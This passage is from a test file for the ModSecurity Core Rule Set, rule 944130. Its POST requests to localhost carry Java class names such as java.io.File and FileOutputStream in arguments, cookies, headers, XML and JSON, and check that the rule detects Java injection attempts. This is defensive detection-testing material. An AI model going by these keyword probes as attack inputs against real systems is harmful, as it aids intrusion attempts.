- input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-58 - desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-59 - desc: "Request header test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-60 - desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-61 - desc: "XML element value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-62 - desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-63 - desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-64 - desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-65 - desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-66 - desc: "Argument test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-67 - desc: "Argument name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-68 - desc: "Cookie test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.CharArrayReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-69 - desc: "Cookie name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.CharArrayReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-70 - desc: "Request header test includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.CharArrayReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-71 - desc: "XML attribute value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-72 - desc: "XML element value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-73 - desc: "Nested XML element value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-74 - desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-75 - desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-76 - desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-77 - desc: "Argument test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-78 - desc: "Argument name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-79 - desc: "Cookie test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-80 - desc: "Cookie name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-81 - desc: "Request header test includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-82 - desc: "XML attribute value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-83 - desc: "XML element value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-84 - desc: "Nested XML element value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-85 - desc: "Content-Type text/plain includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - 
- - test_title: 944130-86 - desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-87 - desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-88 - desc: "Argument test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-89 - desc: "Argument name includes keyword 
java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-90 - desc: "Cookie test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-91 - desc: "Cookie name includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-92 - desc: "Request header test includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-93 - desc: "XML attribute value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-94 - desc: "XML element value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-95 - desc: "Nested XML element value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-96 - desc: "Content-Type text/plain includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-97 - desc: "Content-Type application/json arg value includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-98 - desc: "Content-Type application/json arg name includes keyword java.io.File" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-99 - desc: "Argument test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-100 - desc: "Argument name includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-101 - desc: "Cookie test includes keyword java.io.FileOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
